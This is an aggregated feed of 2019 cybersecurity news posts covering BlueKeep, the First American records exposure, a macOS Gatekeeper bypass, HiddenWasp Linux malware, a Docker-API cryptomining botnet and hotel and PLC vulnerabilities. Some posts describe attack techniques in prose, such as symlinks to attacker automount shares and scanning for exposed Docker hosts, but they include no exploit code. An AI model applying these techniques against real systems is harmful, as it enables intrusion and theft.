“Microsoft is confident that an exploit exists for this vulnerability, and if recent reports are accurate, nearly one million computers connected directly to the internet are still vulnerable to CVE-2019-0708. Many more within corporate networks may also be vulnerable. It only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise.” reads the advisory published by Simon Pope, Director of Incident Response, Microsoft Security Response Center (MSRC). “This scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.”

Even if there has been no sign of attacks exploiting the flaw in the wild Microsoft recommends updating the vulnerable Windows versions as soon as possible. 

“It’s been only two weeks since the fix was released and there has been no sign of a worm yet. This does not mean that we’re out of the woods. If we look at the events leading up to the start of the WannaCry attacks, they serve to inform the risks of not applying fixes for this vulnerability in a timely manner.” concludes the advisory.

“Our recommendation remains the same. We strongly advise that all affected systems should be updated as soon as possible.”

Microsoft also pointed out that workstations not connected to the Internet are also exposed to the risk of a hack.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post Microsoft warns for the second time of applying BlueKeep patch appeared first on Security Affairs.

NY Investigates Exposure of 885 Million Mortgage Documents

New York regulators are investigating a weakness that exposed 885 million mortgage records at First American Financial Corp. [NYSE:FAF] as the first test of the state’s strict new cybersecurity regulation. That measure, which went into effect in March 2019 and is considered among the toughest in the nation, requires financial companies to regularly audit and report on how they protect sensitive data, and provides for fines in cases where violations were reckless or willful.

On May 24, KrebsOnSecurity broke the news that First American had just fixed a weakness in its Web site that exposed approximately 885 million documents — many of them with Social Security and bank account numbers — going back at least 16 years. No authentication was needed to access the digitized records.

On May 29, The New York Times reported that the inquiry by New York’s Department of Financial Services is likely to be followed by other investigations from regulators and law enforcement.

First American says it has hired a third-party security firm to investigate, and that it shut down external access to the records.

The Times says few people outside the real estate industry are familiar with First American, but millions have entrusted their data to the company when they go to close the deal on buying or selling a new home.

“First American provides title insurance and settlement services for property sales, which typically require buyers to hand over extensive financial records to other parties in their transactions,” wrote Stacy Cowley. “The company is one of the largest insurers in the United States, handling around one in every four transactions, according to the American Land Title Association.”

News also emerged this week that First American is now the target of a class action lawsuit alleging the Fortune 500 mortgage industry giant “failed to implement even rudimentary security measures.”

This Week in Security News: Trickbots and Infected Containers

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how a Trickbot attacked a school district’s networks and how infected cryptocurrency-mining containers target docker hosts with exposed APIs.

Read on:

Trickbot Attack Forces Ohio School District to Cancel Classes

A school district in Ohio suspended classes on Monday, May 20, because of a Trickbot attack on its network and computers.


The IoT Attack Surface: Threats and Security Solutions

Part of adopting the IoT is anticipating what else the technology brings to the environments it is being applied to — not least of which are security concerns that can give rise to successful attacks on IoT systems and devices.

Hacker Has Designs on Canva Data, Steals Info Belonging to 139M Users

The graphic design website Canva was hacked in a data theft incident, which exposed usernames, email addresses, encrypted passwords, customer names and more.

CVE-2019-0725: An Analysis of Its Exploitability

A remote code execution vulnerability from May’s Patch Tuesday is particularly hard to ignore: CVE-2019-0725, an RCE vulnerability in Windows Dynamic Host Configuration Protocol (DHCP) Server, which doesn’t require user interaction and affects all versions of Windows Server.

New Mirai Variant Uses Multiple Exploits to Target Routers and Other Devices

Trend Micro discovered a new variant of Mirai that uses a total of 13 different exploits in a single campaign – the first Mirai variant to do so – and has backdoor and distributed denial-of-service (DDoS) capabilities.

First American Hit with Class Action Lawsuit Over Massive Data Exposure

Insurance giant First American Financial is facing a class action lawsuit for negligence after it left more than 885 million sensitive documents dating as far back as 2003 exposed online. 

CVE-2019-11815: A Cautionary Tale About CVSS Scores

At first glance, the details for Linux kernel vulnerability CVE-2019-11815’s score from CVSS seem like a worst-case scenario but assessing a vulnerability’s potential impact goes beyond the attack vector, privileges, and CIA impact of the base score.

Flipboard Says Hackers Stole User Details

Flipboard, a news aggregator service and mobile news app, has started notifying users of a security incident during which hackers had access to internal systems for more than nine months.

Infected Cryptocurrency-Mining Containers Target Docker Hosts With Exposed APIs, Use Shodan to Find Additional Victims

By analyzing the logs and traffic data coming to and from a honeypot, Trend Micro found a container that came from a public and accessible Docker Hub repository named zoolu2 that contained images with the binary of a Monero cryptocurrency miner.

Nearly 1 Million Systems Affected By ‘Wormable’ BlueKeep Vulnerability (CVE-2019-0708)

Almost a million systems are reportedly vulnerable to BlueKeep, a critical vulnerability in remote desktop services, but Microsoft’s Patch Tuesday for May already rolled out patches for BlueKeep and security advisories were released to help users address the vulnerability.

Under GDPR, UK Data Breach Reports Quadruple

The United Kingdom has seen the number of data breach notifications more than quadruple since Europe’s GDPR privacy law went into full force a result of mandatory reporting driving better visibility

Where you surprised that a Trickbot attack could cause school districts to cancel classes? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Trickbots and Infected Containers appeared first on .

Episode 504 – Tools, Tips and Tricks – Gmail Filtering And Address Manipulation Tricks

This week’s tools, tips and tricks epsiode are two tricks to help keep your Gmail spam, undercontrol. Gmail Filters. Be aware, be safe. *** Support the podcast with a cup of coffee *** – Ko-Fi Security In Five Don’t forget to subscribe to the Security In Five Newsletter. —————— Where you can find Security In […]

The post Episode 504 – Tools, Tips and Tricks – Gmail Filtering And Address Manipulation Tricks appeared first on Security In Five.

Cybersecurity Jobs Added to Government’s Shortage Occupation List

Cybersecurity Jobs Added to Government's Shortage Occupation List

Cybersecurity engineers and analysts have been identified as being on the Shortage Occupation List (SOL), in the first full review of officially recognized careers where the shortages “are most severe and where the consequences of those shortages are most serious” since February 2013.

According to the UK Government’s Migration Advisory Committee (MAC), “job shortages in roles such as cybersecurity analysts/engineers and IT network engineers” are now recognized, while the “occupation as a whole ranked highly in our shortage indicators and had an above average vacancy rate.”

In the previous partial update, published in 2015, the job “cybersecurity specialist” was added under the section “information technology and communications professionals not elsewhere classified.” Then, the shortage related to “a person with a minimum of five years’ relevant experience and demonstrable experience of having led a team.”

Since the 2015 partial update, while the need for more skilled cybersecurity professionals remains in this list, it now states “there will be no minimum experience requirement as applying an experience caveat could hinder the development of cybersecurity at all levels.”

This change in requirement follows criticism of hiring practices, where five to 10 years experience is common and cited as a deterrent to new applicants.

In an email to Infosecurity, Ed Williams, director EMEA of SpiderLabs at Trustwave, said: “The security industry is to blame to some degree, there is very much a gatekeeper philosophy, which is starting to be broken down, but not nearly quick enough from my perspective. This industry is so fast paced and exciting, we should be pulling in the brightest and best - these don’t have to come from Computer Science backgrounds.”

The MAC stated the impact of the skills shortage on cybersecurity development, saying that there have been reported delays to “software improvements and features as they do not have the labor or expertise to fulfil demand” and this has led to “an increasing reliance on workers from outside the UK and there is a growing concern surrounding the future skills base for roles within new technical areas.”

The MAC cited “several sources amongst Government and the private sector” who agreed that there is a shortage of digital skills within the UK, evidenced by consistent vacancies in digital occupations, growth in demand for digital skills as well as documented deficiencies across the population in terms of digital skill. However, the MAC acknowledged that “there is not enough domestic supply of sufficiently skilled labor to fill this demand.”

According to Deloitte’s Digital Disruption Index for 2019, only 18% of respondents believe that UK school leavers and graduates have the right digital skills, while only 25% of digital leaders in the UK believe their workforce has sufficient knowledge and expertise to execute their digital strategy.

In the section 'Digital and IT Occupations,' careers as IT specialist managers, IT project and programme managers, IT business analysts, architects and systems designers, programmers and software development professionals, web design and development professionals and information technology and telecommunications professionals were listed as being in shortage. Cybersecurity careers appeared under section SOC 2139 - information technology and telecommunications professionals. 

The MAC said that “short-term mitigations have helped to fill shortages to some extent, but this has had limited impact as the skills required simply are not available.”

As well as short-term mitigations, the MAC said that long-term strategies also have their limitations; as up-skilling staff “is constrained by the lack of expertise in newer areas such as cybersecurity and secondly, these strategies are yet to mature, and so the scale of their impacts cannot truly be assessed until the future.”

As part of the UK’s Digital Strategy, it stated that “there will be even greater demand for people with specialist digital skills” as the digital economy grows. 

“As we leave the European Union, it will be even more important to ensure that we continue to develop our home-grown talent, up-skill our workforce and develop the specialist digital skills needed to maintain our world leading digital sector,” then Secretary of State for Culture, Media and Sport Karen Bradley MP stated.

She acknowledged then that “a strong pipeline of specialist skills - from coding to cyber” was needed, and initiatives like the NCSC’s Cyberfirst have enabled that. However, a more immediate solution is needed until the next generation begin work.

To be placed on the SOL, a job must meet three requirements:

  • Skilled (are the jobs skilled to the required level?)
  • Shortage (is the job in shortage?)
  • Sensible (is it sensible to try to fill those shortages through migration?)

According to the Migration Advisory Committee, being on the SOL conveys certain advantages:

  • Not having to conduct a Resident Labour Market Test (RLMT)
  • Exemption from the £35,000 minimum income threshold for settlement
  • Priority in the event that the cap binds

In the last Cybersecurity Workforce Study from (ISC)2, it claimed that there is a 2.9 million workforce “gap,” with the APAC region suffering the biggest shortfall of 2.14 million, followed by North America (498,000), EMEA (142,000) and Latin America (136,000).

Security expert shows how to bypass macOS Gatekeeper

A security researcher demonstrated how to bypass the Apple macOS Gatekeeper by leveraging trust in network shares.

The Italian security researcher Filippo Cavallarin demonstrated how to bypass the macOS Gatekeeper by leveraging trust in network shares.

The Apple Gatekeeper is designed to protect OS X users by performing a number of checks before allowing an App to run. In fact, you will not be able to execute code that wasn’t signed by an Apple developer, you will not be able to run apps that weren’t downloaded from Apple’s store if the device is not jailbreaked of course.

Filippo Cavallarin demonstrated how to bypass Gatekeeper and execute untrusted code without user explicit permission and any warning to the victims.

Gatekeeper considers both external drives and network shares as safe locations, this means that any application in these locations could run without asking for the user’s consent.

The attacker would need to leverage two legitimate features implemented in macOS, the automount (aka autofs) and the lack of specific checks.

“As per-design, Gatekeeper considers both external drives and network shares as safe locations and it allows any application they contain to run.” wrote the expert.”By combining this design with two legitimate features of MacOS X, it will result in the complete deceivement of the intended behaviour.” 

The autofs feature allows a user to automatically mount a network share by accessing a “special” path, in this specific case any path beginning with “/net/” (i.e. /net/

The second feature that was exploited to include within ZIP archives symbolic links pointing to arbitrary locations, in this case, automount endpoints.

Cavallarin discovered that the software responsible for decompressing the ZIP archives does not perform any check on the symlinks.

An attacker can create a ZIP file containing a symbolic link to an automount endpoint under their control and send it to the victim. The attack scenario sees the victim downloading the archive and follows the symlink, they are redirected to the location controlled by the attacker that is also trusted by Gatekeeper. 

“To better understand how this exploit works, let’s consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls (ex Documents -> /net/ and sends it to the victim. The victim downloads the malicious archive, extracts it and follows the symlink.” continues the expert.

“Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this tecnique very effective and hard to spot.”

Below a video PoC of the attack:

The expert suggests as workaround to disable automount feature with the following procedure:

  1. Edit /etc/auto_master as root
  2. Comment the line beginning with ‘/net’
  3. Reboot

Cavallarin reported his findings to Apple on February 22, 2019, the tech giant likely addressed it on May 15, 2019. 

“The vendor has been contacted on February 22th 2019 and it’s aware of this issue.” concludes the researcher. “This issue was supposed to be addressed, according to the vendor, on May 15th 2019 but Apple started dropping my emails. Since Apple is aware of my 90 days disclosure deadline, I make this information public. ”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Gatekeeper, hacking)

The post Security expert shows how to bypass macOS Gatekeeper appeared first on Security Affairs.

Drone Use on the Rise, Public Safety at Risk

Drone Use on the Rise, Public Safety at Risk

Cybersecurity research firm IOActive has issued a stark warning about the potential, unseen risks surrounding the commercialization of drones – calling for manufacturers to take action.

In July 2018, analysts at Technavio predicted that the commercial drone market would grow by 36% (generating $11.61bn) between 2018 and 2022, but with that growth, IOActive has raised concerns about a range of new risks that could follow.

IOActive claimed that if the commercial market for drones is left unchecked, then we could start to see drones being weaponized, presenting potential hazards and threatening the safety of the public.

As drones become more commercially accessible and their functionality improves, they will also become more affordable, but what so often fails to keep pace when new tech such as this grows in popularity are in-built security features that keep it safe from malicious interference.

IOActive pointed to some key drone security risks that could arise as a result, including how malicious actors could program drones to fly to specific GPS coordinates to launch cyber-attacks on Wi-Fi networks (or other types of wireless networks), or even perform man-in-the-middle attacks and disseminate malware.

What’s more, there is also the real risk of disruption – seen recently in the chaos caused by drone sightings at Gatwick airport – and injury, with the potential for hacked drones to be used to ‘dive-bomb’ pedestrians or impact traffic intersections, IOActive explained. Then there’s the privacy issues, IOActive added, highlighting that drones have the capability to take photos and record audio and video in otherwise impossible to reach areas.

“With enough determination anything can be hacked, but the commercialization of the drone market is making it all too easy – and many of the consequences for security, safety and privacy have simply not been thought through,” said Cesar Cerrudo, CTO at IOActive.

“The range of drones is of particular concern as it opens up new areas of vulnerability that many will not have considered.”

Cerrudo urged manufacturers to shoulder their share of the responsibility for the products they are bringing to market to ensure they are as secure as possible.

“The relative speed at which these devices are taking to the sky raises several issues. While the use of drones within the military has been common for many years, those drones have been rigorously tested and built with security in mind – commercial manufacturers do not have the same concerns, they are more focused on getting their product to market than ensuring cybersecurity. This attitude needs to change.”

HiddenWasp, a sophisticated Linux malware borroes from Mirai and Azazel

Security experts at Intezer have discovered a new Linux malware tracked as ‘HiddenWasp’ that borrows from Mirai, Azazel malicious codes.

HiddenWasp is a new sophisticated Linux malware still undetected by the majority of anti-virus solutions. According to the experts at Intezer, the malware was involved in targeted attacks.  

“Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS activity. It is a trojan purely used for targeted remote control.” reads the analysis published by Intezer.

“Evidence shows in high probability that the malware is used in targeted attacks for victims who are already under the attacker’s control, or have gone through a heavy reconnaissance.”

Researchers from Intezer said that most of HiddenWasp’s code is unique, anyway the authors borrowed chunks of code publicly available open-source malware, such as Mirai and the Azazel rootkit

Like the Linux variant of the Winnti backdoor recently documented by Chronicle, HiddenWasp is composed of a user-mode rootkit, a Trojan, and a script for the initial deployment. 

The script allows the malware to achieve persistence, it creates a new system’s user account and to update older variants if the system was already compromised. Then the script downloads a Tar archive that contains the rootkit, the Trojan, and the initial deployment script. 

“The script will then proceed to download a tar compressed archive from a download server according to the architecture of the compromised system. This tarball will contain all of the components from the malware, containing the rootkit, the trojan and an initial deployment script” continues the experts.

Once installed the malware components, the main Trojan binary will be executed and the rootkit is added to the LD_PRELOAD mechanism. The malicious code also set up various environment variables and the script attempts to gain persistence by adding the trojan to /etc/rc.local.

“It seems that this actor changed the default environment variable from Azazel, that one being HIDE_THIS_SHELL for I_AM_HIDDEN.” continues the experts. “We have based this conclusion on the fact that the environment variable HIDE_THIS_SHELL was not used throughout the rest of the components of the malware and it seems to be residual remains from Azazel original code. “

Researchers also found that the HiddenWasp’s rootkit uses an algorithm similar to the one used by the infamous Mirai.

The rootkit is a user-space based rootkit enforced via LD_PRELOAD mechanism that is delivered in the form of an ET_DYN stripped ELF binary.

Experts linked the Trojan component with ChinaZ’s Elknot malware and other ChinaZ implants, a circumstance that suggests that the author of the HiddenWasp may have integrated some modified versions of the Elknot malware that could have been shared in Chinese hacking forums. 

Some artifacts found by the experts also belong to Chinese open-source rootkit for Linux Adore-ng likely because systems targeted with the HiddenWasp might have been previously compromised with this open-source rootkit. 

“Linux malware may introduce new challenges for the security community that we have not yet seen in other platforms. The fact that this malware manages to stay under the radar should be a wake up call for the security industry to allocate greater efforts or resources to detect these threats.” concludes the report.

“Linux malware will continue to become more complex over time and currently even common threats do not have high detection rates, while more sophisticated threats have even lower visibility.”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – HiddenWasp, Linux malware)

The post HiddenWasp, a sophisticated Linux malware borroes from Mirai and Azazel appeared first on Security Affairs.

Apple Releases Firmware Security Updates for AirPort Base Stations

Apple recently released a series of updates that address several firmware security issues affecting its AirPort base stations. Released on 30 May, the changes fix eight vulnerabilities that apply to the AirPort Extreme and AirPort Time Capsule base stations with 802.11ac. Almost half of these bugs concerned denial-of-service (DoS) attacks. Apple fixed one of these […]… Read More

The post Apple Releases Firmware Security Updates for AirPort Base Stations appeared first on The State of Security.

Compromised Docker Hosts Use Shodan for Cryptocurrency Mining

Researchers have detected a campaign in which compromised docker hosts use Shodan for carrying out cryptocurrency mining.

Hackers scan for Docker hosts with exposed APIs and use them for cryptocurrency mining, which is done by deploying malicious self-propagating Docker images that are infected with Monero miners and scripts which use Shodan for finding vulnerable targets. Researchers at Trend Micro discovered this campaign after a Docker image that contained a Monero (XMR) cryptocurrency miner binary was deployed on one of their honeypots, set up as part of their efforts to monitor malicious activity aimed at containers, Sergiu Gatlan, security/tech reporter at Bleeping Computer writes, “This type of attack is definitely nothing new seeing that researchers from Imperva discovered a similar campaign abusing the CVE-2019-5736 runc vulnerability to deploy cryptominers during early-March.”

“However, the hackers behind the attacks discovered by Trend Micro now also use scripts designed to scan for more vulnerable machines via Shodan search queries scanning for hosts with the 2375 port open and deploying more infected containers to the new targets after brute-forcing their way,” the Bleeping Computer report further says.

Another independent security researcher who goes by the name Caprico, and researchers at Alibaba Cloud too, have observed this campaign.
A blog post dated May 28, 2019 by the Alibaba Cloud researchers says, “Earlier this month, we detected a mining botnet that deploys malicious Docker containers on victim hosts by exploiting Docker’s remote API unauthorized Access vulnerability. We have named the botnet “Xulu” because it serves as username in the botnet’s mining.”

The blog post further says, “Xulu is not the first botnet case that aims at Docker; yet it differs from other botnets by not scanning other hosts by itself, instead it utilizes OSINT (open-source intelligence) technique and dynamically searches Shodan for lists of possible preys…It also placed its controlling server in the Tor network, which is probably an effort to hide the evil backstage manipulator of the botnet.”

The hackers behind the campaign were using the exposed APIs to execute commands on the Docker hosts; these commands would allow them to manage (start, stop or kill) containers and create new ones also by deploying images from a Docker Hub repository that they control.
The Trend Micro team zeroed in on a Docker Hub repository named zoolu2.

Alfredo Oliveira, Senior Threat Researcher at Trend Micro, writes, “By analyzing the logs and traffic data coming to and from the honeypot, we learned that the container came from a public (and thus accessible) Docker Hub repository named zoolu2. Upon checking and downloading the contents of the repository, we found that it contained nine images comprised of custom-made shells, Python scripts, configuration files, as well as Shodan and cryptocurrency-mining software binaries.”

The Trend Micro blog post further explains, “All the images in the zoolu2 repository contained the binary of a Monero (XMR) cryptocurrency miner. This piqued our interest since we’ve already had experience with containers being deployed as miners. In addition, some of the images contained a Shodan script that lists Docker hosts with exposed APIs, which we surmised was being used to identify suitable targets for further container distribution.”

Docker found and took down the repository containing the infected Docker containers and Shodan too disabled accounts used to access its API. But reports say that one malicious Docker image, which has already been downloaded more than 10,000 times, is still available. There have also been reports that point out that the hackers had used another Docker Hub account to host infected containers. When that account was deactivated, they kept moving the containers to other accounts.

A GitHub user reporting this issue writes, “This image is a worm/botnet/whatever targeting unsecured Docker API instances (port tcp/2375)…It uses Tor to update its mining config and continuously scrapes Shodan for exposed Docker instances (with a hardcoded user/pass which I changed) to infect them as well. It also sets up an SSH server, with a hashed password for the root user (basically a backdoor account).”

The Bleeping computer report explains how it all works. The malicious Docker images, which are automatically deployed using a script that looks for exposed APIs and which also remotely creates malicious containers using Docker commands, also starts an SSH daemon that enables remote communication with the hackers. A custom-built Monero coin-mining binary gets launched in the background. Simultaneously, a scanning process that makes use of a third script looks for more victims using Shodan API.

The report explains further, “The list of vulnerable hosts gets written to an iplist.txt file which is checked for duplicates, with all the new targets also being scanned for existing cryptocurrency-mining containers which will be deleted if found…The entire list of IP addresses is then sent to the campaign operators’ command-and-control servers “to deploy additional containers to other exposed hosts based on the IP list. It then loops to the beginning of the routine stated earlier with a new host.””

Also, Read

Cryptocurrency Mining Service Coinhive Set to Shut Down

Firefox to Offer Users Automatic Protection Against Cryptocurrency Mining Malware

Cyrptocoin Minning Malware On The Rise

The post Compromised Docker Hosts Use Shodan for Cryptocurrency Mining appeared first on .

Chrome extension devs must drop deceptive installation tactics

After announcing its intention to limit third-party developers’ access to Chrome’s webRequest API, which is used by many ad-blocking extensions to filter out content, Google has followed up with announcements for a few more changes meant “to create stronger security, privacy, and performance guarantees”: Chrome extension developers must ditch any deceptive installation tactic they have been using Extensions must only request access to the appropriate data needed to implement their features Extensions that handle user-provided … More

The post Chrome extension devs must drop deceptive installation tactics appeared first on Help Net Security.

UK Universities Facing Daily State-Sponsored Attacks

UK Universities Facing Daily State-Sponsored Attacks

UK universities are facing increased attacks from state-sponsored hackers, who are targeting their research programs.

According to a survey of 75 senior IT leaders across 68 UK universities by VMware and Dell EMC, a quarter of respondents said their institution is targeted on a daily basis, while one in 10 strongly agreed that a successful attack on their research could have a harmful impact on the lives of UK citizens.

The research also found that 24% of UK universities believed their security and defense research may have already been infiltrated, while over half (53%) said a cyber-attack on their institution has led to research ending up in foreign hands.

John Chapman, CISO, UK Public Sector at Dell EMC, said: “In conducting research that may shape the future of the nation and its citizens, universities are under the microscope of some of the world’s most well-resourced and potent cyber-attackers. We hope this study will encourage them to look critically at their cybersecurity readiness. Universities must do more to protect themselves, and the sensitive information they hold, against the ever-expanding range of increasingly sophisticated threats.”

Specifically, cyber-criminals target scientific (54%), medical (50%), economic (37%) and defense research (33%). The research also found that 49% of university IT leaders recognize that a lack of IT investment is one of the forces driving the need for more robust cybersecurity practices.

In a statement sent to Infosecurity, Universities UK said: "Data security is an absolute priority for higher education providers and students alike. Universities UK is working with university leaders and the National Cyber Security Centre to help improve and strengthen security practices to better protect the sector from cyber threats. This includes the development of robust guidance on cybersecurity which we will release later this year.”

The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains

vpnMentor researches have recently discovered that hotel brands managed by The Pyramid Hotel Group have suffered a data leak.

vpnMentor experts have discovered that hotel brands managed by The Pyramid Hotel Group, including Marriott, have suffered a data leak,

vpnMentor’s research team discovered the unprotected server through port scanning to examine known IP blocks.

Researchers discovered 85.4GB of security audit logs, the exposed data also include monitoring and alerts, reported system errors, misconfiguration, policy violations, potential attempted malicious breaches, and other cybersecurity events. Unsecured data also include personally identifying information (PII) of employees.

Exposed data is date back to April 19, 2019, likely the date of the system setup or reconfiguration that is the root cause of the leak.

The unsecured server exposed audit logs generated by Wazuh, an open-source intrusion detection system used by the company.

“The Pyramid Hotel Group utilizes Wazuh – an open source intrusion detection system – on an unsecured server that is leaking information regarding their operating systems, security policies, internal networks, and application logs.” reads the post published by vpnMentor.

Pyramid Hotel Group

The Pyramid Hotel Group manages hospitality and resort properties in the US, Hawaii, the Caribbean, Ireland, and the UK, it includes locations of several brands such as Marriott, Sheraton, Plaza, Hilton Hotel and other independent hotels.

Data leaked by the company could be used by attackers to gather information about hotels’ network and security measures implemented to protect them. This information could be used by hackers in later attacks.

Below the timeline of discovery:

5/27/19Breach discovered by vpnMentor Research team
5/28/19Informed PHG of breach
5/28/19Received acknowledgement from PHG
5/29/19Data leak closed. Problem resolved.

Recently vpnMentor experts discovered an unprotected database impacting up to 65% of US households.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Pyramid Hotel Group, data leak)

The post The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains appeared first on Security Affairs.

Cybersecurity in a 5G World, What You Should Know

These days, it seems that all people can talk about is 5G technology and how it will change the world. For those that don’t really quite understand the magnitude of what 5G means, then you’ve come to the right place.

Today, we will explore the capabilities of 5G technology, various benefits, and how cybersecurity ties into all the hoopla (you didn’t think that we’d forget about cybersecurity, right?).

woman using tablet and computer 5G

What is 5G?

If you do a quick Google search, you’ll probably find a glut of information detailing about 5G and the technical aspects of why this is so good, so we’ll try to keep things as simple as possible.

First off, to keep things simple, the ‘G’ in 5G, 4G, 3G, etc. all stand for “Generation.” Essentially, they are upgraded versions of wireless signal strength and speed at which data can travel.

For newer generations (reminder: the higher the G the better), such as 5G, this type of wireless signal will be capable of pushing data at peak speeds that are more than 20 times faster than 4G.

In terms of latency, which is a fancy term for data communication delays, 5G is more than 100 times faster than 4G.

Pretty much this means that 5G will have virtually zero chance of ever experiencing random drop times or speed slowdowns that plagues 4G networks right now.

If you thought your 4G mobile speed was already lightning fast, then you’re in for quite a ride with 5G.

To help you better understand just how fast 5G can actually be, here is a quick overview of the time it would take for different wireless generations to download a standard HD movie (roughly 3GB file size) according to Lifewire:

  • 3G: 1 hour and 8 minutes
  • 4G: 40 minutes
  • 4G LTE: 27 minutes
  • 5G: 35 seconds

As you can see, the jump in data speeds are quite stark. Add in the fact that the network connection will always be stable and connected, then we have some pretty powerful stuff on our hands.

But do we actually need this kind of ridiculous speed in our lives? The answer is YES!


What Will 5G Be Used For?

Now that we understand just how fast 5G actually is, then we can understand why we need this in our lives (no, it isn’t for you to download Netflix movies really fast, although most people will use it for that exact reason).

5G actually will serve a major purpose in our lives and that will come in the form of the Internet of Things (IoT).

IoT is essentially a technology that enables us to connect all of our devices, appliances, vehicles, and even our homes to the internet. Check our previous blog post where we discuss this more in depth.

Wait, but can’t we already connect these items to the internet through 4G? Yes, this is indeed true, but 4G would really be limited to simple data retrieval like updating the weather, downloading new GPS maps, etc.

This is due to the fact that 4G’s maximum throughput (another fancy schmancy term for maximum data flow through the internet and your devices) peaks around 1 Gbps (gigabits per second) while 5G hits the 20 Gbps range.

Why is this even important? Well, this is what makes 5G the true difference maker in taking IoT to a whole different realm of possibilities.

Since 5G has much faster speeds and low latency connections, now we can really make dreams of autonomous driving vehicles, remotely controlled machines, or even online surgeries completed by doctors from around the world. The last one is a bit of a ways away, but it’s certainly within the realm of possibility.

Here’s an example of how South Korea is showcasing its 5G capabilities. The video below shows how companies in the future could begin remotely controlling heavy machinery at dangerous sites with 5G’s low latency and high speeds.

This could forever change how companies operate by enabling true experts to handle complex machines all without leaving their bedroom or even coming close to risking their lives.

Where Does Cybersecurity Fit?

As quick as we can imagine the amazing possibilities that 5G technology could provide, we need to really consider the dangers that come with such power. The biggest elephant in the room for future IoT devices connected by 5G technology will be the threat of cyber hackers.

Imagine a scenario where your loved one is having surgery performed remotely by one of the world’s most accomplished surgeons that is located halfway around the world. This situation could go one of two ways. It would either be a truly world changing event or it could simply be a disaster waiting to happen.

The scary part is that since remote connection only requires a connection to the internet, then this automatically leaves us exposed and vulnerable to cyber attacks. We don’t even want to think of the issues that could spring up if a hacker could maliciously take over a remote surgery in the future.

Now, the even scarier part is that since the rollout of 5G is still in its infancy, the thought of cybersecurity has not really crossed the minds of manufacturers and technology providers.

This could lead to a situation where a major hacking episode will scare everyone straight and bring a high priority red flag towards integrating cybersecurity. But we are here today to argue that cybersecurity needs to be just as important as the underlying technology here.

The issue is that most of these connections and data will be passed through new communications protocols. For instance, data travelling from an automobile will not rely on the same protocols as a simple blog about your favorite travel destinations.

This poses problems for many cybersecurity vendors who are at a disadvantage in protecting this fast growing market.

How Cloudbric Can Help

By leveraging our years of award winning web application security experience, as well as the development of new IoT based threat detection systems, we hope to shift the importance of cybersecurity into the IoT future.

Throughout time the internet has been somewhat disjointed from our lives. Back in the early days of the internet, users had to connect online through dial up services. As we continued to progress with connectivity, the closest the internet has come into our lives is through our mobile phones.

However, the future will be quite different once internet connected automobiles, household appliances, heavy machinery, etc. becomes a much more polished and prominent technology in our lives. This calls for a much higher need for cybersecurity to play a central role to ensure the safety and wellbeing of all users.

Here at Cloudbric, we will be leveraging our new patented deep learning detection and threat filtering system to help monitor data communications for IoT based devices.

Our new solution will be part of a growing suite of solutions at Cloudbric where we are focused on bringing our enterprise security experience to the general user crowd.

In the future, autonomous automobiles and even household appliances will be connected via Cloudbric IoT security platform that filters data in and out of each device. This will not only ensure high performance of each device, but will protect the end users from any harmful spying, remote manipulation of the device itself, and so on.


Whenever people think of 5G technology, their thoughts are extremely short sighted in the fact that they only concern themselves with speed for their mobile phones or PC. However, 5G technology’s true purpose and intention is to bring IoT technology to the forefront.

In other words, 5G will open our eyes to a whole new world of limitless possibilities now that daily appliances and new class of devices will be connected to the internet.

This will make even the wildest of dreams become a reality, such as deploying the world’s best surgeon to perform robotic real time connected surgery from halfway across the world.

Although this opens so many positive doors for mankind, the possibility of cyber threats will certainly play a central role since these devices will need to be connected to the internet at all times. This leaves the IoT appliances and its users vulnerable to cyber attacks.

Allowing the IoT world to flourish and protect its users will be a tough task, but this is where cybersecurity vendors will become a necessity. Security vendors are not without their challenges.

Protecting IoT data communications requires new solution technology that is able to monitor, detect, and block attacks aimed at its protocols. Cloudbric will be one of a handful of companies focusing resources to this endeavor within the next year.

In summary, 5G technology, with its impressive speed, stability, and connectivity, will power our future. As a society, we need to be heavily prepared for the risks involved in having all devices around our lives connected to the internet and even powered remotely by people across the globe.

The time for cybersecurity is now and the ability for vendors to protects users will be the difference maker.

The post Cybersecurity in a 5G World, What You Should Know appeared first on Cloudbric.

Siemens LOGO!, a PLC for small automation projects, open to attack

LOGO!, a programmable logic controller (PLC) manufactured by Siemens, sports three vulnerabilities that could allow remote attackers to reconfigure the device, access project files, decrypt files, and access passwords. About LOGO! LOGO! is an intelligent logic module meant for small automation projects in industrial (control of compressors, conveyer belts, door control, etc.), office/commercial and home settings (lighting control, pool-related control tasks, access control, etc.). It is deployed worldwide and can be controlled remotely. About the … More

The post Siemens LOGO!, a PLC for small automation projects, open to attack appeared first on Help Net Security.

Researchers fight ransomware attacks by leveraging properties of flash-based storage

Ransomware continues to pose a serious threat to organizations of all sizes. In a new paper, “Project Almanac: A Time-Traveling Solid State Drive,” University of Illinois students Chance Coats and Xiaohao Wang and Assistant Professor Jian Huang from the Coordinated Science Laboratory look at how they can use the commodity storage devices already in a computer, to save the files without having to pay the ransom. Recovering data encrypted by a variety of ransomware families … More

The post Researchers fight ransomware attacks by leveraging properties of flash-based storage appeared first on Help Net Security.

New infosec products of the week: May 31, 2019

